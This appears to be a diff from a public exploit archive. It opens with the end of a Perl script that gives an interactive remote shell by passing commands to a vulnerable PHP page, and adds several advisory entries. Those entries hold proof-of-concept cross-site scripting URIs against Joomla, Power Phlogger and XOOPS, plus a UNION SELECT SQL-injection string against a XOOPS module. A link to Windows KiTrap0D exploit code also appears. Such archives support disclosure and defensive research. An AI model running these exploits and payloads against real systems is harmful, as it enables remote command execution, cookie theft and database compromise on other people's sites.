print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";
print "[shell] ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path."/funzioni/lib/menulast.php?LANG=".$apache[$apachepath]."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}

13
platforms/php/webapps/33377.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/37145/info
The Joomla! ProofReader component is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects ProofReader 1.0 RC9 and prior.
The following proof-of-concept URIs are available:
http://www.example.com/1";alert(document.cookie);//
http://www.example.com/page?";alert(document.cookie);//

9
platforms/php/webapps/33378.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37148/info
Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Unspecified versions of Joomla! 1.5.x prior to 1.5.12 are vulnerable.
http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E

9
platforms/php/webapps/33380.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37150/info
Power Phlogger is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attackers can exploit this issue to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Power Phlogger 2.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

9
platforms/php/webapps/33381.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37155/info
The Content module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Content 0.5 is affected; other versions may also be vulnerable.
http://www.example.com/modules/content/index.php?id=-1+UNION+SELECT+1,2,3,@@version,5,6,7,8,9,10,11--

11
platforms/php/webapps/33382.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37156/info
The SmartMedia module for XOOPS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SmartMedia 0.85 Beta is affected; other versions may also be vulnerable.
The following example URI is available:
http://www.example.com/modules/smartmedia/folder.php?categoryid=1>"><ScRiPt>alert(0);</ScRiPt>&folderid=1&start=0

2
platforms/windows/local/11199.txt
View file

@ -153,7 +153,7 @@ Possibly naive example code for triggering this condition is availble from the
link below.
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip
http://www.exploit-db.com/sploits/KiTrap0D.zip
Exploit-DB Mirror: http://www.exploit-db.com/sploits/KiTrap0D.zip
The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista
and Windows 7. Support for other affected operating systems is left as an